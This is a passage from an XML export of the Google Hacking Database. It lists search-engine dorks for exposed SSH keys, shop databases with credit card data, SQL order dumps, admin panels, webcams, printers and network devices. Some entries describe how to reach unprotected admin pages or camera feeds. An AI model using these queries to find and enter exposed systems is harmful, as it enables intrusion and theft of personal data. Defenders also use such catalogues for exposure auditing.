<shortDescription>ssh_host_dsa_key.pub + ssh_host_key + ssh_config = &quot;index of / &quot;</shortDescription>
<textualDescription>#Google dork: ssh_host_dsa_key.pub + ssh_host_key + ssh_config = &quot;index of/ &quot;
#Catregory: Sensitive directories
#Expoit Author: Abishekraghav Murugeashan
#linkedIn: https://www.linkedin.com/in/arhaxor21/
</textualDescription>
<query>ssh_host_dsa_key.pub + ssh_host_key + ssh_config = &quot;index of / &quot;</query>
<querystring>https://www.google.com/search?q=ssh_host_dsa_key.pub + ssh_host_key + ssh_config = &quot;index of / &quot;</querystring>
<edb></edb>
<date>2020-11-17</date>
<author>Abishekraghav Murugeashan</author>
</entry>
<entry>
<id>5174</id>
<link>https://www.exploit-db.com/ghdb/5174</link>
<category>Sensitive Directories</category>
<shortDescription>type:mil inurl:ftp ext:pdf | ps</shortDescription>
<textualDescription>Dork : type:mil inurl:ftp ext:pdf | ps
Description : this dork gives you sensitive directories via ftp.
Author : botsec0
</textualDescription>
<query>type:mil inurl:ftp ext:pdf | ps</query>
<querystring>https://www.google.com/search?q=type:mil inurl:ftp ext:pdf | ps</querystring>
<edb></edb>
<date>2019-04-10</date>
<author>botsec0</author>
</entry>
<entry>
<id>36</id>
<link>https://www.exploit-db.com/ghdb/36</link>
<category>Sensitive Directories</category>
<shortDescription>winnt</shortDescription>
<textualDescription>The \WINNT directory is the directory that Windows NT is installed into by default. Now just because google can find them, this doesn't necessarily mean that these are Windows NT directories that made their way onto the web. However, sometimes this happens. Other times, they aren't Windows NT directories, but backup directories for Windows NT data. Wither way, worthy of a nomination.</textualDescription>
<query>index.of.winnt</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3Aindex.of.winnt</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>548</id>
<link>https://www.exploit-db.com/ghdb/548</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>&quot;More Info about MetaCart Free&quot;</shortDescription>
<textualDescription>MetaCart is an ASP based shopping Cart application with SQL database. A security vulnerability in the free demo version of the product (MetaCartFree) allows attackers to access the database used for storing user provided data (Credit cart numbers, Names, Surnames, Addresses, E-mails, etc).</textualDescription>
<query>&quot;More Info about MetaCart Free&quot;</query>
<querystring>https://www.google.com/search?hl=de&amp;q=%22More+Info+about+MetaCart+Free%22&amp;btnG=Suche</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>322</id>
<link>https://www.exploit-db.com/ghdb/322</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>Comersus.mdb database</shortDescription>
<textualDescription>Comersus is an e-commerce system and has been installed all over the world in more than 20000 sites. Using Comersus does not require that you know any programming language. BackOffice+ allows you to define virtually all properties of your on-line store through an intuitive, point-&amp;-click interface.This search goes directly for one of the MS Access files used by the shopping cart. Searching Google and the well know security sites for Comersus reveals more security problems.</textualDescription>
<query>inurl:&quot;/database/comersus.mdb&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3A%22%2Fdatabase%2Fcomersus.mdb%22</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3963</id>
<link>https://www.exploit-db.com/ghdb/3963</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>dcid= bn= pin code=</shortDescription>
<textualDescription>Information disclosure of reservation information,which can leak to many other leaks.
All related to t Booking.com client who decided to save theirs trip data online,sometime near personal information like passport
By popshark1
</textualDescription>
<query>dcid= bn= pin code=</query>
<querystring>https://www.google.com/search?q=dcid= bn= pin code=</querystring>
<edb></edb>
<date>2014-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7276</id>
<link>https://www.exploit-db.com/ghdb/7276</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>intext:&quot; Design &amp; Developed by Antique Touch - INDIA&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot; Design &amp; Developed by Antique Touch - INDIA&quot;
# Sensitive Online Shopping Info
# Date: 20/07/2021
# Exploit Author: Cliffe Zeding</textualDescription>
<query>intext:&quot; Design &amp; Developed by Antique Touch - INDIA&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot; Design &amp; Developed by Antique Touch - INDIA&quot;</querystring>
<edb></edb>
<date>2021-09-22</date>
<author>Cliffe Zeding</author>
</entry>
<entry>
<id>4309</id>
<link>https://www.exploit-db.com/ghdb/4309</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>intext:&quot;Dumping data for table `orders`&quot;</shortDescription>
<textualDescription>Dork finds SQL dump files containing personal information
By warlock72</textualDescription>
<query>intext:&quot;Dumping data for table `orders`&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Dumping data for table `orders`&quot;</querystring>
<edb></edb>
<date>2016-07-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>988</id>
<link>https://www.exploit-db.com/ghdb/988</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>intext:&quot;powered by Hosting Controller&quot; intitle:Hosting.Controller</shortDescription>
<textualDescription>Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.The HC has its own complete billing solution which is tightly integrated within Control Panel &amp; does all the invoicing &amp; billing.Vuln:======A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.More on Vuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html</textualDescription>
<query>intext:&quot;powered by Hosting Controller&quot; intitle:Hosting.Controller</query>
<querystring>https://www.google.com/search?q=intext%3A%22powered+by+Hosting+Controller%22+intitle%3AHosting.Controller+&amp;filter=0</querystring>
<edb></edb>
<date>2005-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>1000</id>
<link>https://www.exploit-db.com/ghdb/1000</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>intext:&quot;Powered by X-Cart: shopping cart software&quot; -site:x-cart.com</shortDescription>
<textualDescription>X-Cart (version 4.0.8) has multiple input validation vulnerabilities. There doesn't seem to be any way to search for specific versions of the software with Google. See http://www.securitytracker.com/alerts/2005/May/1014077.html for more information.</textualDescription>
<query>intext:&quot;Powered by X-Cart: shopping cart software&quot; -site:x-cart.com</query>
<querystring>https://www.google.com/search?safe=off&amp;c2coff=1&amp;q=intext%3A%22Powered+by+X-Cart%3A+shopping+cart+software%22+-site%3Ax-cart.com</querystring>
<edb></edb>
<date>2005-06-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>7695</id>
<link>https://www.exploit-db.com/ghdb/7695</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>inurl:/commodities.php?id=</shortDescription>
<textualDescription># Google Dork: inurl:/commodities.php?id=
# Sensitive Online Shopping Info
# Date: 08/11/2021
# Exploit Author: Harshit Koli</textualDescription>
<query>inurl:/commodities.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:/commodities.php?id=</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Harshit Koli</author>
</entry>
<entry>
<id>549</id>
<link>https://www.exploit-db.com/ghdb/549</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>inurl:midicart.mdb</shortDescription>
<textualDescription>MIDICART is s an ASP and PHP based shopping Cart application with MS Access and SQL database. A security vulnerability in the product allows remote attackers to download the product's database, thus gain access to sensitive information about users of the product (name, surname, address, e-mail, phone number, credit card number, and company name).</textualDescription>
<query>inurl:midicart.mdb</query>
<querystring>https://www.google.com/search?q=inurl%3Amidicart.mdb&amp;btnG=Google-Suche</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7751</id>
<link>https://www.exploit-db.com/ghdb/7751</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>inurl:product-list.php?id=</shortDescription>
<textualDescription># Google Dork: inurl:product-list.php?id=
# Sensitive Online Shopping Info
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>inurl:product-list.php?id=</query>
<querystring>https://www.google.com/search?q=inurl:product-list.php?id=</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>545</id>
<link>https://www.exploit-db.com/ghdb/545</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>inurl:shopdbtest.asp</shortDescription>
<textualDescription>shopdbtest is an ASP page used by several e-commerce products. A vulnerability in the script allows remote attackers toview the database location, and since that is usually unprotected, the attacker can then download the web site's database by simly clicking on a URL (that displays the active database). The page shopdbtest.asp is visible to all the users and contains the full configuration information. An attacker ca therefore download the MDB (Microsoft Database file), and gain access to sensitive information about orders, users, password, ect.</textualDescription>
<query>inurl:shopdbtest.asp</query>
<querystring>https://www.google.com/search?hl=de&amp;q=inurl%3Ashopdbtest.asp&amp;btnG=Suche</querystring>
<edb></edb>
<date>2004-10-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>280</id>
<link>https://www.exploit-db.com/ghdb/280</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>POWERED BY HIT JAMMER 1.0!</shortDescription>
<textualDescription>Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who &quot;pay for surfing ads&quot; and advertise spam services or software.An attacker can find these sites by searching for the typical &quot;powered by hit jammer !&quot; frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice.</textualDescription>
<query>POWERED BY HIT JAMMER 1.0!</query>
<querystring>https://www.google.com/search?q=POWERED+BY+HIT+JAMMER+1.0%21&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>7787</id>
<link>https://www.exploit-db.com/ghdb/7787</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>site:mail.* intitle:Dashboard</shortDescription>
<textualDescription># Google Dork: site:mail.* intitle:Dashboard
# Sensitive Online Shopping Info
# Date: 12/11/2021
# Exploit Author: Soriful Islam Shoaib</textualDescription>
<query>site:mail.* intitle:Dashboard</query>
<querystring>https://www.google.com/search?q=site:mail.* intitle:Dashboard</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Soriful Islam Shoaib</author>
</entry>
<entry>
<id>735</id>
<link>https://www.exploit-db.com/ghdb/735</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>site:ups.com intitle:&amp;quot;Ups Package tracking&amp;quot; intext:&amp;quot;1Z ### ### ## #### ### #&amp;quot;</shortDescription>
<textualDescription>Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Digital Spirit</textualDescription>
<query>site:ups.com intitle:&quot;Ups Package tracking&quot; intext:&quot;1Z ### ### ## #### ### #&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;q=site%3Aups.com+intitle%3A%22Ups+Package+tracking%22+intext%3A%221Z+%23%23%23+%23%23%23+%23%23+%23%23%23%23+%23%23%23+%23%22</querystring>
<edb></edb>
<date>2004-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>301</id>
<link>https://www.exploit-db.com/ghdb/301</link>
<category>Sensitive Online Shopping Info</category>
<shortDescription>VP-ASP Shop Administrators only</shortDescription>
<textualDescription>VP-ASP (Virtual Programming - ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything.It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQJ injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html</textualDescription>
<query>inurl:&quot;shopadmin.asp&quot; &quot;Shop Administrators only&quot;</query>
<querystring>https://www.google.com/search?q=inurl%3A%22shopadmin.asp%22+%22Shop+Administrators+only%22</querystring>
<edb></edb>
<date>2004-06-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3988</id>
<link>https://www.exploit-db.com/ghdb/3988</link>
<category>Various Online Devices</category>
<shortDescription>&quot;.git&quot; intitle:&quot;Index of&quot;</shortDescription>
<textualDescription>Shows publicly browsable .git directories</textualDescription>
<query>&quot;.git&quot; intitle:&quot;Index of&quot;</query>
<querystring>https://www.google.com/search?q=&quot;.git&quot; intitle:&quot;Index of&quot;</querystring>
<edb></edb>
<date>2015-02-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>5145</id>
<link>https://www.exploit-db.com/ghdb/5145</link>
<category>Various Online Devices</category>
<shortDescription>&quot;/1000/system_information.asp&quot;</shortDescription>
<textualDescription>Find Pioneer router control panels. no login needed.
~ CrimsonTorso
</textualDescription>
<query>&quot;/1000/system_information.asp&quot;</query>
<querystring>https://www.google.com/search?q=&quot;/1000/system_information.asp&quot;</querystring>
<edb></edb>
<date>2019-03-07</date>
<author>CrimsonTorso</author>
</entry>
<entry>
<id>6781</id>
<link>https://www.exploit-db.com/ghdb/6781</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Account&quot; &quot;Password&quot; &quot;All rights reserved&quot; intitle:&quot;HG8245&quot;</shortDescription>
<textualDescription>Dork: &quot;Account&quot; &quot;Password&quot; &quot;All rights reserved&quot; intitle:&quot;HG8245&quot;</textualDescription>
<query>&quot;Account&quot; &quot;Password&quot; &quot;All rights reserved&quot; intitle:&quot;HG8245&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Account&quot; &quot;Password&quot; &quot;All rights reserved&quot; intitle:&quot;HG8245&quot;</querystring>
<edb></edb>
<date>2021-02-08</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>4670</id>
<link>https://www.exploit-db.com/ghdb/4670</link>
<category>Various Online Devices</category>
<shortDescription>&quot;ADS-B Receiver Live Dump1090 Map &quot;</shortDescription>
<textualDescription>Dork who show traffic air for ADS-B Receiver.
Dork by Rootkit_Pentester.
</textualDescription>
<query>&quot;ADS-B Receiver Live Dump1090 Map &quot;</query>
<querystring>https://www.google.com/search?q=&quot;ADS-B Receiver Live Dump1090 Map &quot;</querystring>
<edb></edb>
<date>2018-02-13</date>
<author>Rootkit_Pentester</author>
</entry>
<entry>
<id>4379</id>
<link>https://www.exploit-db.com/ghdb/4379</link>
<category>Various Online Devices</category>
<shortDescription>&quot;All site content&quot; ext:aspx</shortDescription>
<textualDescription>Dork for locate Sharepoint Administration webs.
Enjoy healthy.
Dork made by Rootkit Pentester.</textualDescription>
<query>&quot;All site content&quot; ext:aspx</query>
<querystring>https://www.google.com/search?q=&quot;All site content&quot; ext:aspx</querystring>
<edb></edb>
<date>2017-01-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4109</id>
<link>https://www.exploit-db.com/ghdb/4109</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Build ref: 26&quot;</shortDescription>
<textualDescription>Google Dork Description: Automatic Number Plate Recognition Systems (ANPRs)
Cameras
Google Search: &quot;Build ref: 26&quot;
Vendor: PIPS Technology (3M)
http://www.roadtraffic-technology.com/contractors/photo_enforcement/pips-technology
Listing of ANPRs/ALPRs cameras.
John Jolly</textualDescription>
<query>&quot;Build ref: 26&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Build ref: 26&quot;</querystring>
<edb></edb>
<date>2015-11-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6467</id>
<link>https://www.exploit-db.com/ghdb/6467</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Camera Live Image&quot; inurl:&quot;guestimage.html&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Camera Live Image&quot; inurl:&quot;guestimage.html&quot;
# Various online devices (webcams).
# Date: 07/08/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Camera Live Image&quot; inurl:&quot;guestimage.html&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Camera Live Image&quot; inurl:&quot;guestimage.html&quot;</querystring>
<edb></edb>
<date>2020-08-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6703</id>
<link>https://www.exploit-db.com/ghdb/6703</link>
<category>Various Online Devices</category>
<shortDescription>&quot;change the Administrator Password.&quot; intitle:&quot;HP LaserJet&quot; -pdf</shortDescription>
<textualDescription># Google Dork: &quot;change the Administrator Password.&quot; intitle:&quot;HP LaserJet&quot; -pdf
# HP Printer login portals.
# Date: 25/11/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;change the Administrator Password.&quot; intitle:&quot;HP LaserJet&quot; -pdf</query>
<querystring>https://www.google.com/search?q=&quot;change the Administrator Password.&quot; intitle:&quot;HP LaserJet&quot; -pdf</querystring>
<edb></edb>
<date>2020-12-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>744</id>
<link>https://www.exploit-db.com/ghdb/744</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Copyright (c) Tektronix, Inc.&quot; &quot;printer status&quot;</shortDescription>
<textualDescription>Captain, the Phasers are online :)</textualDescription>
<query>&quot;Copyright (c) Tektronix, Inc.&quot; &quot;printer status&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;q=%22Copyright+%28c%29+Tektronix%2C+Inc.%22+%22printer+status%22</querystring>
<edb></edb>
<date>2004-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6813</id>
<link>https://www.exploit-db.com/ghdb/6813</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Copyright(C) CONTEC CO.LTD&quot;</shortDescription>
<textualDescription># Category: Various online devices
# Description: Find dashboards of several measurement systems for
photovoltaic power generation
# Google Dork: &quot;Copyright(C) CONTEC CO.LTD&quot;
# Vendor Homepage: https://www.contec.com/products-services/environmental-monitoring/solarview/pv-package/sv-cpt-pack01/feature/
# Author: js-on
# Date: 28/2/2021
Cheers!
</textualDescription>
<query>&quot;Copyright(C) CONTEC CO.LTD&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Copyright(C) CONTEC CO.LTD&quot;</querystring>
<edb></edb>
<date>2021-03-01</date>
<author>js-on</author>
</entry>
<entry>
<id>7220</id>
<link>https://www.exploit-db.com/ghdb/7220</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Datamanager&quot; &quot;Devices&quot; &quot;Reports&quot; &quot;Alarm&quot; &quot;Log&quot; &quot;Service&quot; &quot;Gp Run-On&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Datamanager&quot; &quot;Devices&quot; &quot;Reports&quot; &quot;Alarm&quot; &quot;Log&quot; &quot;Service&quot; &quot;Gp Run-On&quot;
# Various Online Devices
# Date: 11/09/2021
# Exploit Author: Mugdha Peter Bansode</textualDescription>
<query>&quot;Datamanager&quot; &quot;Devices&quot; &quot;Reports&quot; &quot;Alarm&quot; &quot;Log&quot; &quot;Service&quot; &quot;Gp Run-On&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Datamanager&quot; &quot;Devices&quot; &quot;Reports&quot; &quot;Alarm&quot; &quot;Log&quot; &quot;Service&quot; &quot;Gp Run-On&quot;</querystring>
<edb></edb>
<date>2021-09-15</date>
<author>Mugdha Peter Bansode</author>
</entry>
<entry>
<id>930</id>
<link>https://www.exploit-db.com/ghdb/930</link>
<category>Various Online Devices</category>
<shortDescription>&quot;display printer status&quot; intitle:&quot;Home&quot;</shortDescription>
<textualDescription>Xerox Phaser printers.</textualDescription>
<query>&quot;display printer status&quot; intitle:&quot;Home&quot;</query>
<querystring>https://www.google.com/search?q=%22display+printer+status%22+intitle:%22Home%22&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>5721</id>
<link>https://www.exploit-db.com/ghdb/5721</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Firmware Version&quot; intitle:&quot;iLO&quot; ProLiant Login -hpe.com -update</shortDescription>
<textualDescription>Dork for device (iLo ProLiant HPE) discovery.
This is an alternative to shodan
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>&quot;Firmware Version&quot; intitle:&quot;iLO&quot; ProLiant Login -hpe.com -update</query>
<querystring>https://www.google.com/search?q=&quot;Firmware Version&quot; intitle:&quot;iLO&quot; ProLiant Login -hpe.com -update</querystring>
<edb></edb>
<date>2020-01-30</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>6459</id>
<link>https://www.exploit-db.com/ghdb/6459</link>
<category>Various Online Devices</category>
<shortDescription>&quot;HP LaserJet&quot; inurl:&quot;SSI/index.htm&quot;</shortDescription>
<textualDescription># Google Dork: &quot;HP LaserJet&quot; inurl:&quot;SSI/index.htm&quot;
# Various online devices (HP LaserJet Printers).
# Date: 29/07/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;HP LaserJet&quot; inurl:&quot;SSI/index.htm&quot;</query>
<querystring>https://www.google.com/search?q=&quot;HP LaserJet&quot; inurl:&quot;SSI/index.htm&quot;</querystring>
<edb></edb>
<date>2020-07-29</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>674</id>
<link>https://www.exploit-db.com/ghdb/674</link>
<category>Various Online Devices</category>
<shortDescription>&quot;intitle:Cisco Systems, Inc. VPN 3000 Concentrator&quot;</shortDescription>
<textualDescription>The Cisco VPN 3000 Concentrator is a remote access VPN. The 'Concentrator' is a piece of hardware that manages a companies VPN's. This google dork searches for the Concentrators login portal for remote access. With the correct username and password an attacker can '0wn' their Concentrator; i.e. be able to delete, copy, read, configure anything on the Concentrator.</textualDescription>
<query>&quot;intitle:Cisco Systems, Inc. VPN 3000 Concentrator&quot;</query>
<querystring>https://www.google.com/search?c2coff=1&amp;q=%22intitle%3ACisco+Systems%2C+Inc.+VPN+3000+Concentrator%22</querystring>
<edb></edb>
<date>2004-11-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>7093</id>
<link>https://www.exploit-db.com/ghdb/7093</link>
<category>Various Online Devices</category>
<shortDescription>&quot;IPECS&quot; inurl:a_index.html</shortDescription>
<textualDescription># Google Dork: &quot;IPECS&quot; inurl:a_index.html
# Category: Various Online Devices
# Date: 30/07/2021
# Exploit Author: s Thakur
</textualDescription>
<query>&quot;IPECS&quot; inurl:a_index.html</query>
<querystring>https://www.google.com/search?q=&quot;IPECS&quot; inurl:a_index.html</querystring>
<edb></edb>
<date>2021-08-23</date>
<author>s Thakur</author>
</entry>
<entry>
<id>4169</id>
<link>https://www.exploit-db.com/ghdb/4169</link>
<category>Various Online Devices</category>
<shortDescription>&quot;IPSentry - Device Statistics Information&quot;</shortDescription>
<textualDescription>This Dork show Device Statistics Information, about a lot of network
infraestructures xD. Enjoy Healthy.
Dork Discovered for Rootkit Pentester.</textualDescription>
<query>&quot;IPSentry - Device Statistics Information&quot;</query>
<querystring>https://www.google.com/search?q=&quot;IPSentry - Device Statistics Information&quot;</querystring>
<edb></edb>
<date>2015-12-31</date>
<author>anonymous</author>
</entry>
<entry>
<id>1415</id>
<link>https://www.exploit-db.com/ghdb/1415</link>
<category>Various Online Devices</category>
<shortDescription>&quot;LANCOM DSL/*-* Office *&quot; &quot;Entry Page&quot;</shortDescription>
<textualDescription>h**p://www.lancom-systems.de/Login page for these Lancom online DSL devices.</textualDescription>
<query>&quot;LANCOM DSL/*-* Office *&quot; &quot;Entry Page&quot;</query>
<querystring>https://www.google.com/search?q=%22LANCOM+DSL/*-*+Office+*%22+%22Entry+Page%22&amp;num=20&amp;filter=0</querystring>
<edb></edb>
<date>2006-10-02</date>
<author>anonymous</author>
</entry>
<entry>
<id>7201</id>
<link>https://www.exploit-db.com/ghdb/7201</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Language&quot; &quot;SIM NUM&quot; &quot;DEV NUM&quot; intitle:&quot;mdvr&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Language&quot; &quot;SIM NUM&quot; &quot;DEV NUM&quot; intitle:&quot;mdvr&quot;
# Various Online Devices
# Date: 08/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>&quot;Language&quot; &quot;SIM NUM&quot; &quot;DEV NUM&quot; intitle:&quot;mdvr&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Language&quot; &quot;SIM NUM&quot; &quot;DEV NUM&quot; intitle:&quot;mdvr&quot;</querystring>
<edb></edb>
<date>2021-09-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6930</id>
<link>https://www.exploit-db.com/ghdb/6930</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Name&quot; &quot;Password&quot; intitle:&quot;LANCOM 1790VA&quot;</shortDescription>
<textualDescription># Dork: &quot;Name&quot; &quot;Password&quot; intitle:&quot;LANCOM 1790VA&quot;</textualDescription>
<query>&quot;Name&quot; &quot;Password&quot; intitle:&quot;LANCOM 1790VA&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Name&quot; &quot;Password&quot; intitle:&quot;LANCOM 1790VA&quot;</querystring>
<edb></edb>
<date>2021-05-14</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>6973</id>
<link>https://www.exploit-db.com/ghdb/6973</link>
<category>Various Online Devices</category>
<shortDescription>&quot;NETGEAR, Inc. All rights reserved&quot; intitle:&quot;Netgear Prosafe Plus Switch&quot;</shortDescription>
<textualDescription># Dork: &quot;NETGEAR, Inc. All rights reserved&quot; intitle:&quot;Netgear Prosafe Plus Switch&quot;</textualDescription>
<query>&quot;NETGEAR, Inc. All rights reserved&quot; intitle:&quot;Netgear Prosafe Plus Switch&quot;</query>
<querystring>https://www.google.com/search?q=&quot;NETGEAR, Inc. All rights reserved&quot; intitle:&quot;Netgear Prosafe Plus Switch&quot;</querystring>
<edb></edb>
<date>2021-06-01</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>1291</id>
<link>https://www.exploit-db.com/ghdb/1291</link>
<category>Various Online Devices</category>
<shortDescription>&quot;OK logout&quot; inurl:vb.htm?logout=1</shortDescription>
<textualDescription>This is a google dork for Hunt Electronics web cams. To get to the cameras remove the vb.htm?logout=1 from the url.</textualDescription>
<query>&quot;OK logout&quot; inurl:vb.htm?logout=1</query>
<querystring>https://www.google.com/search?q=%22OK+logout%22+inurl:vb.htm%3Flogout%3D1&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>5082</id>
<link>https://www.exploit-db.com/ghdb/5082</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Please click here to download and install the latest plug-in. Close your browser before installation.&quot;</shortDescription>
<textualDescription># Exploit Title: NVR Login Portal.
# Google Dork: &quot;Please click here to download and install the latest plug-in. Close your browser before installation.&quot;
# Description: Find NVR (Network Video Recorder) login portals.
# Date: 18/01/2019.
# Exploit Author: Sohaib E.B.
# Category: Pages Containing Login Portals
</textualDescription>
<query>&quot;Please click here to download and install the latest plug-in. Close your browser before installation.&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Please click here to download and install the latest plug-in. Close your browser before installation.&quot;</querystring>
<edb></edb>
<date>2019-01-21</date>
<author>Sohaib E.B.</author>
</entry>
<entry>
<id>950</id>
<link>https://www.exploit-db.com/ghdb/950</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Please use Netscape 2.0 or enhance !!&quot; -site:dlink.com -site:ovislink.com.tw</shortDescription>
<textualDescription>A search for some HTML code used in a variety of D-link network devices (webcams and such).</textualDescription>
<query>&quot;Please use Netscape 2.0 or enhance !!&quot; -site:dlink.com -site:ovislink.com.tw</query>
<querystring>https://www.google.com/search?q=%22Please+use+Netscape+2.0+or+enhance+!!%22+-site:dlink.com+-site:ovislink.com.tw&amp;num=100&amp;c2coff=1&amp;safe=off&amp;filter=0</querystring>
<edb></edb>
<date>2005-04-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>640</id>
<link>https://www.exploit-db.com/ghdb/640</link>
<category>Various Online Devices</category>
<shortDescription>&quot;please visit&quot; intitle:&quot;i-Catcher Console&quot; Copyright &quot;iCode Systems&quot;</shortDescription>
<textualDescription>CCTV webcams by ICode.</textualDescription>
<query>&quot;please visit&quot; intitle:&quot;i-Catcher Console&quot; Copyright &quot;iCode Systems&quot;</query>
<querystring>https://www.google.com/search?q=%22please+visit%22+intitle:%22i-Catcher+Console%22+Copyright+%22iCode+Systems%22&amp;num=100&amp;hl=nl&amp;filter=0</querystring>
<edb></edb>
<date>2004-11-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6575</id>
<link>https://www.exploit-db.com/ghdb/6575</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Pop-up&quot; + &quot;Live Image&quot; inurl:index.html</shortDescription>
<textualDescription># Google Dork: &quot;Pop-up&quot; + &quot;Live Image&quot; inurl:index.html
# Various online devices (webcams).
# Date: 28/09/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Pop-up&quot; + &quot;Live Image&quot; inurl:index.html</query>
<querystring>https://www.google.com/search?q=&quot;Pop-up&quot; + &quot;Live Image&quot; inurl:index.html</querystring>
<edb></edb>
<date>2020-09-28</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5157</id>
<link>https://www.exploit-db.com/ghdb/5157</link>
<category>Various Online Devices</category>
<shortDescription>&quot;Powered by Trac 1.0.2&quot;</shortDescription>
<textualDescription>Find Reporting-based websites that are using Trac.
~ CrimsonTorso
</textualDescription>
<query>&quot;Powered by Trac 1.0.2&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Powered by Trac 1.0.2&quot;</querystring>
<edb></edb>
<date>2019-03-18</date>
<author>CrimsonTorso</author>
</entry>
